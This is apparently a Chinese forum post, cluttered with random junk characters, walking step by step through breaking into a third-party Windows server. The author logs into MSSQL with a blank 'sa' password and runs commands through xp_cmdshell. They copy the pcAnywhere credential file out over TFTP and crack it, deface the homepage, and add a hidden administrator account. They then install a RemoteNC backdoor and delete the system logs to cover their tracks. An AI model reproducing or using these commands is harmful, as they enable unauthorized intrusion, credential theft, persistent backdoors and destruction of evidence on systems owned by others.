|
先ping出目标主机的IP地址: ; P5 N; J$ d- r" S
连接IP主机: 211.154.xxx.xx... + m2 C1 {. G" R* y+ D2 W4 x/ ?( { E% }4 x
发送 56 个字节... $ E* a& u) T( Z* l" [# |
接收到 56 个字节! 历时: 0毫秒 8 A0 R# g l" o
结论: IP主机正在与Internet连接中... " D7 L4 L% K: n% c2 o% P
接着选择打开扫描器x-way,选择高级扫描功能。输入目标IP,开始扫描。数分钟后得到扫描结果如下(结果经整理): 2 ]5 W u, _& e" z' Z" p8 m9 X7 n: @
主机信息 ' r3 O# b& Y, F4 g; [, R1 w4 c$ p7 l
主机名:BEWDB01NOK
7 O- y0 W- ^) c1 A" Z80(HTTP) 3 w0 m- T* o/ o, I5 i
21(FTP Control) ( V" R# I' n( x' |. c- ~
25(SMTP)
& ?! R5 G- m5 B) c' l443(HTTPS)
! v# f4 B, l3 y- Q- U1433(MSSQL)
. ?# _7 Q* b- ~5 p4 @4 h( c5631(PCAnyWhere) : ` z/ E+ T- P4 u# z! @; `0 i% s
用户列表
# `& V5 _7 i" R( LAdministrator (Admin) Guest hacker (Admin) IUSR_BEWDB01NOK IWAM_BEWDB01NOK ogilvy remoteuser (Admin) 4 U, x. _3 }9 i9 [
漏洞: ( t: @( P, \( t5 F
/\../readme.txt (HTTP: 200 )
; F. {+ B2 w+ t/msadc/msadcs.dll (HTTP: 200 )
# ^8 S4 h# y- N/iisadmpwd/achg.htr (HTTP: 200 ) ' y: p% a9 j" H# C- A" i
/_AuthChangeUrl (HTTP: 200 ) * l( Z3 y* Q& B* R" y! z! O, w
/?PageServices (HTTP: 200 )
* H6 C2 o- {" m+ _ 上一步中得到目标服务器的相关有用信息。可以发现扫描结果中并无可用的asp/cgi漏洞。而从所开端口来看,
; K! ` M3 e- {, p21(FTP Control) . w# k9 }) l; |- _6 a9 ^7 _6 I A
1433(MSSQL)
% v( g# Y3 Q# W5631(PCAnyWhere)
: e9 W) C& O0 y* j% h# ?+ b6 k只有这三个可用。在万一得已的情况下,我是不会用暴力破ftp的。那么只好从 ' W0 c, k1 u; ]6 Y5 r% m6 a
1433,5631这两个端口入手了!我们知道,1433是ms-sql的服务端口,默认情况下它的最高权限用户帐号SA口令为空。如果管理员疏忽了这一点,没有给SA一个口令的话,事情就好办了!先来试试看。从www.tianxing.org下一个ms-sql的客户端,在Host框中输入目标ip:211.154.xxx.xx 4 E# n4 `8 n, j+ c
Username为sa * k# @/ E% J* j& F' G/ Z9 G, r
password框空,连接:
6 p" q" {+ {" o) USQL>Connecting 211.154.xxx.xx
8 a' ?, t6 @/ O( OSQL>Connected to 211.154.xxx.xx 7 \$ |6 {1 `5 q* P
呵呵!看来对方管理员没有对sa设置一个口令!太好了!可以在客户端以xp_cmdshell " "的形式运行任意dos指令了!dir一下试试看: 6 o; o5 j- X1 b( }3 f) F8 B+ H
SQL>Command: xp_cmdshell "dir c:\" 9 G& v3 C9 F: s. j3 b% r2 E+ ]# u
驱动器 C 中的卷没有卷标。
* [: B7 H, P1 c$ f# J6 g9 V& j5 p卷的序列号是 5CBD-664C
0 M0 y' ?1 D5 I% V4 V, [# u卷的序列号是 5CBD-664C
9 Q3 @ Z- i2 D3 z7 Z! Zc:\ 的目录 " V2 |' J4 X- n) K
c:\ 的目录 8 a- o: o I# H) I8 L; A! K
01-12-20 08:13p <DIR> 2u2u
% C% K, y( m$ M- ^0 I3 x( w; {0 B' c' I01-07-23 08:10p 0 AUTOEXEC.BAT
% ] A7 P" ~! r; E% i V01-11-28 04:02p 84 biaoti.txt % l: ^ P3 w# ~4 ?: p/ L: i) _( p
01-07-23 08:10p 0 CONFIG.SYS , B# n0 W. v: Z/ ]% {
01-11-22 11:49a <DIR> InetPub
! \& Y2 m- o, f) ^01-10-25 11:12a 15,360 kkkk.XLS
$ g" Z7 j5 V k: x& ]01-07-24 12:09p <DIR> MSSQL7
7 a5 p2 n0 X: m+ v- y9 x01-12-12 11:00a 134,217,728 pagefile.sys
b# O* y+ y' X, |9 ^7 ]01-11-30 10:59a <DIR> Program Files
, S3 X% ]" v$ N# E01-09-04 02:43p 136 sp_attach.sql 4 n' Z4 n5 Y0 s' Z
01-12-20 04:12p <DIR> temp
3 [' A# X4 m& J |) t01-09-27 11:14a <DIR> unzipped % r3 f+ n7 P( i/ @6 ]% w
01-12-15 12:09a <DIR> WINNT ) B& \5 X, G3 K( x" N
13 个文件 134,233,308 字节 ! R2 \$ \; b& T2 I$ p
54,232,576 字节可用 8 i; k! n M5 {* h
54,232,576 字节可用 3 _! C$ U1 t# C$ ~0 I/ |) ^) i
这时我们便可以改对方的主页了!前提是先找到对方的web目录!来找找看 h8 L9 ` ]4 T0 K. h
…………
3 S. H% T7 L; ]& d7 \# bXX分钟后,满头大汉,乖乖!竟然有X个盘,每个盘下又有XX个目录,这样找下去得何年何月?不成!要是有windows界面的形式就好找的多了!想想看,目标主机还开着5631端口,这正是pcanywhere远程管理端口呀!取了它的管理帐号和密码不就得了吗?不错的想法,呵呵……
& R5 O. A7 m( C) G$ v& m' D默认情况下,pcanywhere安装于c:\Program Files目录下,其data目录下的.cif文件中保存着加密过的连接帐号和密码。只要得到此文件,就可以用一个叫pcanywherepwd的软件快速解出密码!
' e/ p1 Z! z% B, U5 d% Q且看如何得到这个.cif文件。先用x-way的内置tftp服务器在本机建立tftp服务:
2 u2 T0 R6 M, Q; }2 p; p" }选择“工具”菜单中的tftp服务器。设置一个默认根目录,点启动即可!
. V0 X3 W2 S; H8 N0 ?4 P然后再用ms-sql客户端在目标服务器执行如下指令:
7 P' c* r: H6 E) D' [/ O6 Z" ^copy c:\progra~1\pcanywhere\data\New Caller.CIF c:\winnt\system32
5 ~9 r7 I$ ~8 l, Ntftp -i 本地ip put New Caller.CIF 6 t' D# |1 V; G: }
命令执行成功,这个cif文件已被传到本地tftp目录下了!
$ e& |5 B6 z2 _* \- Q% t2 w- E O此时,用pcanywherepwd.exe破解此文件,得到用户名为:administrator
6 u. W+ E; @# S; @4 L& @# T1 |密码为:amsrepair
4 d& l7 L/ V7 r" A! m$ k打开pcanywhere manager建立一个指向211.154.xxx.xx的通道。在setting项中选择network host pc to control or ip adress, 并添上目标ip:211.154.xxx.xx
9 f1 s' H2 f/ _0 v! A选中login information项中的automatically login to host up connection 3 u6 D6 z- |; [
并在下面的login name和password栏中添入刚才得到的用户名和密码!确定即可。双击新建立的通道,稍等片刻即可看到了对方桌面。这下好搞了,呵呵~~在 ! @& ]5 p5 `/ F
g:\home\wwweb\目录下,终于找到了他们的index.htm。删!再手动定一个简单的文件:
* U& C) X+ d$ _/ I9 E* Z<html>
0 l' S/ f. ], \0 R# t& `<head> 4 A( M6 }, i' f7 t$ N
<title>hacked<title>
! i8 V- q4 w# x7 [</head>
v; b% l. Q- U' w<body>
9 A6 {8 ?- \- ]0 G( W<center> Z0 ]9 e$ F$ R* a9 @. ~( w4 j+ J0 ]. [
hacked
4 [2 C& ?) D# Y" Q" c</center>
4 R$ h5 x9 _' E: [* A; q. }</body>
% l( S j+ A6 @9 ]: G# \" ~8 O保存为:index.htm 3 {( i) C9 ~& h2 Z
修改主页完成。 2 q, n. q. w- J
9 Y' L; i# w( A1 M/ _/ S! P/ c+ s/ q
该留个后门了,这是个NT主机,用小榕的RemoteNC做后门最好不过了!
* f( I5 G) _. r0 J: g+ r2 t0 H先给系统加个超级用户,用ms-sql来做: ) X+ u% E# R7 k! J
net user wing wing /add % m$ p9 Z% S3 f7 f* @
net localgroup administrators wing /add 9 {9 n) h. i! X0 G! s7 e4 Z
从对方桌面上打开ie连到小榕的站上下载RemoteNC,然后进入命令提示行状态,键入:
* t( q& z$ \6 D/ E- D4 MRemoteNC 211.154.xxx.xx wing wing LocalSystem "RemoteNC" "Provide Local CMD Redirect" 7 123456 a) q" g3 m. Z O& h6 |
系统显示: 0 V9 j% q8 l; L# g" Z
[Install Service as RunasUser Mode] + j; v0 A4 R h2 i6 G: _4 D
Connecting 211.154.xxx.xx ..... Done.
3 y, A( K' B( [9 M: `Transffer File ..... Done.
( R" E$ _' K2 Q. k% |% n7 t# E+ ]Start Service ..... Done.
% p3 X9 g$ D( h3 B2 `2 [% k4 D! m# R4 }* [8 w% E* ], N. K6 J
Now You can 211.154.xxx.xx to Connect, Have a Joy 安装成功
- E v; x6 `' M& `3 \这样在任何时候都可以telnet 211.154.xxx.xx 7输入密码:123456即可使用系统任何资源了!
2 ]( K" u! z0 M2 c5 R接下来该清理战场了,在ms-sql下停掉对方的ftp和www服务: ( F5 v3 B0 k8 a0 a1 }0 k
net stop msftpsvc 2 U5 t" m3 {/ }5 b' s# O* _4 D
net stop w3svc 8 y& @1 O# k. _4 }2 |. W/ v
删除c:\winnt\sys tem32\logfile下的所有文件。 * i* i0 k9 i# I1 o" `, @2 ]
再将服务恢复:
1 }$ U1 L7 {1 h2 p# g. g- `3 \9 [net start msftpsvc ! k9 B( X9 {# Q! E6 H V4 x0 ?) m
net start w3svc |